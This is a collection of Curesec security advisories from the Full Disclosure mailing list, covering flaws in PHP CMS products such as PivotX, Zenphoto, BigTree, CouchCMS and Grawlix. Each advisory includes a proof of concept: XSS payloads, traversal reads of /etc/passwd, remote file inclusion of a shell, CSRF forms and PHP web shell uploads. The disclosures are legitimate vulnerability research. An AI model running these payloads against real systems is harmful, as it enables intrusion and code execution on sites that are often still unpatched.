Security Advisory - Curesec Research Team 1. Introduction Affected Product:PivotX 2.3.11 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Reflected XSS Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to reflected XSS, allowing for the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of PivotX, this may lead to code execution via other vulnerabilities in the same version in the admin area. 3. Details Description CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The additionalpath parameter of the file explorer is vulnerable to reflected XSS. Proof of Concept http://localhost/pivotx_latest/pivotx/index.php?page=homeexplore&additionalpath =pivotalert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Reflected-XSS-155.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Zenphoto 1.4.11: RFI
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Zenphoto 1.4.11 Fixed in: 1.4.12 Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/ zenphoto-1.4.12.zip Vendor Website: http://www.zenphoto.org/ Vulnerability Type: RFI Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to03/15/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is vulnerable to remote file inclusion. An admin account is required. 3. Details Description CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C When downloading a log file, the input is not properly sanitized, leading to RFI. An admin account is required, and allow_url_fopen must be set to true - which is the default setting. In old versions of PHP, this would additionally lead to LFI via null byte poisoning or path expansion, regardless of allow_url_fopen settings. Proof of Concept GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page= logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename= security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1 Code // admin-logs.php (sanitize(x, 3) only strips out tags) case 'download_log': $zipname = sanitize($_GET['tab'], 3) . '.zip'; if (class_exists('ZipArchive')) { $zip = new ZipArchive; $zip->open($zipname, ZipArchive::CREATE); $zip->addFile($file, basename($file)); $zip->close(); ob_get_clean(); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/zip"); header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" ); header("Content-Transfer-Encoding: binary"); header("Content-Length: " . filesize($zipname)); readfile($zipname); // remove zip file from temp path unlink($zipname); exit; } else { include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php'); $zip = new ZipStream($zipname); $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file)); $zip->finish(); } break; 4. Solution To mitigate this issue please upgrade at least to version 1.4.12: https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 01/29/2016 Vendor replies 02/23/2016 Vendor sends fix for verification 02/23/2016 Suggested improvements for attempted fix 02/29/2016 Delayed Disclosure 03/14/2016 Vendor releases fix 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PivotX 2.3.11: Directory Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PivotX 2.3.11 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Directory Traversal Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to Directory Traversal, allowing authenticated users to read and delete files outside of the PivotX directory. 3. Details Description CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N The function cleanPath which is responsible for sanitizing path names can be bypassed by an attacker, leading to directory traversal in multiple places. Proof of Concept Admins and Superadmins can read any file: http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir= L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=.././/...//.//.../ /.//...//.//...//.//...//.//...//etc/passwd Advanced users, Admins and Superadmins can delete any file, possibly leading to DOS: http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.//.../ /.//...//.//...//.//...//.//...//.//...//important/ important.file&pivotxsession=ovyyn4ob2jc5ym92 Code lib.php function cleanPath($path) { $path = str_replace('../', '', $path); $path = str_replace('..\\', '', $path); $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path); return $path; } 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] BigTree 4.2.8: Object Injection & Improper Filename Sanitation
Security Advisory - Curesec Research Team 1. Introduction Affected Product:BigTree 4.2.8 Fixed in:BigTree 4.2.9 Fixed Version Link: https://www.bigtreecms.org/download/ Vendor Website: https://www.bigtreecms.org/ Vulnerability Type: Object Injection & Improper Filename Sanitation Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 03/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview BigTree CMS is a CMS written in PHP. In version 4.2.8, it is vulnerable to object injection. The impact of this vulnerability is currently small - privileged users can update settings they are not allowed to update - but may be more extensive depending on installed plugins. In addition to the object injection, BigTree also has a function called cleanFile which is supposed to prevent directory traversal, but which can be bypassed. The function is not currently used by BigTree itself, but may be used by plugins. 3. Object Injection Description CVSS: Low 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N BigTree passes unvalidated user input to unserialize, leading to PHP object injection. The vulnerability is in the backend, so a user account with the role developer or admin is required. A successful exploitation may for example lead to an admin editing settings they are not authorized to edit. In BigTree, the admin role is less privileged than the developer role. For example, an admin can only edit a subset of the settings. The impact of the vulnerability is currently small, as BigTree does not implement __wakeup in any classes, none of the classes implement the iterator interface, and __destruct is only implemented in a limited number of classes, and only one of the cases seems relevant to security: The destructor of the BigTreeCMSBase class updates all settings, without again validating if the user is allowed to update the setting and without re-validating the value of a setting. This may for example lead to persistent XSS - the admin does not have the right to post scripts, as this would weaken the distinction between admins and developers - by changing the colophon setting. An admin has the right to edit this setting, but the input is HTML encoded before putting it in the database. By bypassing this encoding, a malicious admin can inject scripts. It should be noted that custom modules may contain classes that lead to a bigger security impact of this vulnerability. Proof of Concept The attack can be achieved in a browser by visiting the following URL and clicking on save: http://localhost/BigTree-CMS/site/index.php/admin/trees/edit/2/?view_data= [INJECTED OBJECT] A payload to update the setting "bigtree-internal-security-policy" may for example be: a:2:{s:7:"bigtree";O:14:"BigTreeCMSBase":2:{s:16:"AutoSaveSettings";a:1: {s:32:"bigtree-internal-security-policy";a:1:{s:3:"foo";s:3:"bar";}} s:15:"ModuleClassList";a:2:{s:9:"DemoTrees";s:5:"trees";s:10:"DemoQuotes"; s:6:"quotes";}}s:4:"view";s:6:"foobar";} The actual request is a POST request to /BigTree-CMS/site/index.php/admin/trees /edit/process/, where the _bigtree_return_view_data field contains the base64 encoded payload. Code /process.php $return_view_data = unserialize(base64_decode($_POST["_bigtree_return_view_data"])); if (!$bigtree["form"]["return_view"] || $bigtree["form"]["return_view"] == $return_view_data["view"]) { $redirect_append = array(); unset($return_view_data["view"]); // We don't need the view passed back. foreach ($return_view_data as $key => $val) { $redirect_append[] = "$key=".urlencode($val); } $redirect_append = "?".implode("&",$redirect_append); } /cms.php function __destruct() { foreach ($this->AutoSaveSettings as $id => $obj) { if (is_object($obj)) { BigTreeAdmin::updateSettingValue($id,get_object_vars($obj)); } else { BigTreeAdmin::updateSettingValue($id,$obj); } } } 4. Improper Filename Sanitation Description The function cleanFile is supposed to prevent directory traversal, but currently it does not fulfill its task, as an attacker can easily bypass the filter via //. The function is currently not used for any sensitive tasks, but it may be used by extensions or in the future. Code /* Function: cleanFile Makes sure that a file path doesn't contain abusive characters (i.e. ../) Parameters: file - A file name Returns: Cleaned up string. */ static function cleanFile($file) { return str_replace("../","",$file); } 5. Solution To mitigate this issue please upgrade at least to version 4.2.9: https://www.bigtreecms.org/download/ Please note that a newer version might already be available.
[FD] PivotX 2.3.11: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PivotX 2.3.11 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to code execution by authenticated users because it does not check the extension of files when renaming them. 3. Details Description CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload functionality checks file extensions when uploading files to prevent the uploading of malicious files such as PHP files. However, the rename function does not check the extension of the new filename, leading to code execution. An account in the advanced users, admins, or superadmins role is required to upload files. Proof of Concept 1. Upload an image file containing PHP code with a valid extension such as png 2. rename it so it has a PHP extension: http://localhost/pivotx_latest/pivotx/ index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer= shell.php 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Code-Execution-153.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Opendocman 1.3.4: HTML Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Opendocman 1.3.4 Fixed in:1.3.5 Fixed Version Link: http://www.opendocman.com/free-download/ Vendor Website: http://www.opendocman.com/ Vulnerability Type: HTML Injection Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description To defend against XSS and similar attacks, opendocman depends on a function that filters all input to remove dangerous tags and attributes. The filter does filter out all simple approaches to XSS, but it still leaves an attacker with large control over the look and functionality of the website. This can lead to phishing attacks, privilege escalation, defacement, and may lead to XSS with older browsers. There are likely other possibilities for attackers. It is recommended to HTML-encode user input before echoing it to mitigate these issues, instead of relying on input filtering. These issues are present across the application and are reflected as well as persistent, for example via the profile or comments. 3. Proof of Concept Privilege Escalation A registered user can exploit this issue in combination with social engineering to gain admin rights: - Change any profile field, such as last name, to: Smith">http://localhost/opendocman-1.3.4/search.php/";> Phishing & Defacement Attacker-controlled elements can be shown in places where a user would only expect application-controlled data, not user data, which can be used in phishing attacks or to deface the website. A simple example would be: http://localhost/opendocman-1.3.4/search.php/";>http://evil.com"; style= "background: red; color: white">Security Alert: Please upgrade to the latest version here!http://localhost/opendocman-1.3.4/add.php The same is possible when updating a user profile here: http://localhost/opendocman-1.3.4//profile.php It should be noted that by default, the registration is not open, but there is an option to open registration for anyone. 4. Code The problem exists across the application. A quick search reveals at least these code snippets which are likely open to reflected attacks. Further parameters are likely vulnerable as well. Additionally, all user input that is persisted seems to be affected as well. check-out.php:'; category.php: rejects.php:echo ''; rejects.php:echo ''; search.php:http://www.opendocman.com/free-download/ Please note that a newer version might already be available. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for different issue for verification 01/13/2016 Confirmed fix 01/20/2016 Vendor requests more time to fix XSS issues 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Opendocman 1.3.4: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Opendocman 1.3.4 Fixed in:1.3.5 Fixed Version Link: http://www.opendocman.com/free-download/ Vendor Website: http://www.opendocman.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Opendocman does not have CSRF protection, which means that an attacker can perform actions for an admin, if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin User: http://localhost/opendocman-1.3.4/user.php"; method="POST" enctype="multipart/form-data"> 4. Solution To mitigate this issue please upgrade at least to version 1.3.5: http://www.opendocman.com/free-download/ Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for CSRF for verification 01/13/2016 Confirmed CSRF fix 01/20/2016 Vendor requests more time to fix other issues in same version 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Atutor 2.2: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Atutor 2.2 Fixed in:partly in ATutor 2.2.1-RC1, complete in 2.2.1 Fixed Version Link: http://www.atutor.ca/atutor/download.php Vendor Website: http://www.atutor.ca/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Atutor is a learning management system (LMS) written in PHP. In version 2.2, it is vulnerable to multiple reflected and persistent XSS attacks. The vulnerabilities can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a successful exploitation can lead to code execution via the theme uploader, and if the victim is an instructor, this can lead to code execution via a file upload vulnerability in the same version of Atutor. 3. Details XSS 1: Reflected XSS - Calendar CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The calendar_next parameter of the calendar is vulnerable to XSS. This issue has been fixed in ATutor 2.2.1-RC1. Proof of Concept: http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next
[FD] esoTalk 1.0.0g4: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:esoTalk 1.0.0g4 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: t...@esotalk.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and possibly prior versions, there is a reflected XSS vulnerability in the search because a given URL is echoed unencoded in multiple places. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Proof of Concept http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/esoTalk-100g4-XSS-124.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CouchCMS 1.4.5: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CouchCMS 1.4.5 Fixed in:1.4.7 Fixed Version Link: http://www.couchcms.com/products/ Vendor Website: http://www.couchcms.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C Description When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9. 3. Proof of Concept POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary=---18851501621445926637695954351 Content-Length: 529 -18851501621445926637695954351 Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht" Content-Type: application/octet-stream [base64: iVBORw0KGgoNSUhEUgAAACAgCAIAAAD8GO2jCXBIWXMAAA7EAAAOxAGVKw4bYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAElFTkSuQmCC] The shellcode used can be found here: https://www.idontplaydarts.com/2012/06/ encoding-web-shells-in-png-idat-chunks/ 4. Solution To mitigate this issue please upgrade at least to version 1.4.7: http://www.couchcms.com/products/ Please note that a newer version might already be available. 5. Report Timeline 11/17/2015 Informed Vendor about Issue 11/18/2015 Vendor sends fixes for confirmation 11/20/2015 Verified fixes 11/24/2015 Vendor releases fix 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Grawlix 1.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area. 3. Proof of Concept Change admin password: http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php"; method="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CouchCMS 1.4.5: XSS & Open Redirect
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CouchCMS 1.4.5 Fixed in:1.4.7 Fixed Version Link: http://www.couchcms.com/products/ Vendor Website: http://www.couchcms.com/ Vulnerability Type: XSS & Open Redirect Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Details XSS 1 When displaying a post, the name of any additional GET parameters is echoed unencoded, leading to XSS. Proof of Concept: http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo";>alert(2)bar=1 Code: function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents = 1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){ [...] $pagination .= "$counter";\ [...] $pagination .= "$counter"; [...] $pagination .= "$lpm1"; $pagination .= "$lastpage"; [... (all $targetpage . $pagestring are affected) ...] } XSS 2 When displaying comments, the name of any additional GET parameters is echoed unencoded, leading to XSS. Proof of Concept: http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo";>alert(1)bar=1 Code: /couch/edit-comments.php href="">t('all'); ?> | href="&status=0">t('unapproved'); ?> | href="&status=1">t('approved'); ?> (of '.$page_title.')'; } ?> [...] | t('view'); ?> | t('edit'); ?> | t('delete'); ?> Open Redirect The filter which checks if a user supplied redirect value leads to external pages can be bypassed by an attacker. Proof of Concept (Only works for logged in victims or after login): http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com Code: /couch/auth/auth.php function redirect( $dest ){ global $FUNCS, $DB; // sanity checks $dest = $FUNCS->sanitize_url( trim($dest) ); if( !strlen($dest) ){ $dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE; } elseif( strpos(strtolower($dest), 'http')===0 ){ if( strpos($dest, K_SITE_URL)!==0 ){ // we don't allow redirects external to our site $dest = K_SITE_URL; } } $DB->commit( 1 ); header( "Location: ".$dest ); die(); } 4. Solution To mitigate this issue please upgrade at least to version 1.4.7: http://www.couchcms.com/products/ Please note that a newer version might already be available. 5. Report Timeline 11/17/2015 Informed Vendor about Issue 11/18/2015 Vendor sends fixes for confirmation 11/20/2015 Verified fixes 11/24/2015 Vendor releases fix 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CouchCMS-145-XSS-amp-Open-Redirect-126.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Grawlix 1.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3 and possibly prior versions, it contains multiple reflected XSS vulnerabilities. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Details XSS 1 When searching for a book in the admin area, the keyword parameter is echoed unencoded inside the value attribute of an input tag, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword="; autofocus onfocus="alert(1) Code: _admin/book.view.php XSS 2 The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=alert(1) Code: _admin/slot.label-set.ajax.php echo '$_GET|';print_r($_GET);echo '|'; XSS 3 The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=";>alert(1) Code: _admin/site.nav-edit.ajax.php $edit_id = $_GET['edit_id']; [...] $modal->value($edit_id); _admin/lib/GrlxForm.php $this->value ? $value = ' value="'.$this->value.'"' : null; XSS 4 When viewing the book overview, the start_sort_order parameter is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order="; onmouseover="alert(1) Code: _admin/book.view.php $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order"); XSS 5 (limited) In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id="; style="STYLE http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id="; style="STYLE 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-XSS-129.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Grawlix 1.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description Grawlix is a CMS for publishing comics, which is written in PHP. When uploading an image icon for a link, neither the file type nor the file extension are checked, leading to code execution. It should be noted that admin credentials are required to upload an icon, and that because of a bug when uploading icons, the upload only works if Grawlix is installed in the root directory. 3. Proof of Concept function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/_admin/site.link-list.php";, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---172718417319970434061213874184"); xhr.withCredentials = true; var body = "-172718417319970434061213874184\r\n" + "Content-Disposition: form-data; name=\"input[title]\"\r\n" + "\r\n" + "Site name\r\n" + "-172718417319970434061213874184\r\n" + "Content-Disposition: form-data; name=\"input[url]\"\r\n" + "\r\n" + "http://google.com\r\n"; + "-172718417319970434061213874184\r\n" + "Content-Disposition: form-data; name=\"icon_file\"; filename=\"test.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php \n" + "passthru($_GET[\'x\']);\n" + "\r\n" + "-172718417319970434061213874184\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "save\r\n" + "-172718417319970434061213874184--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-Code-Execution-127.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Arastta 1.1.5: SQL Injection
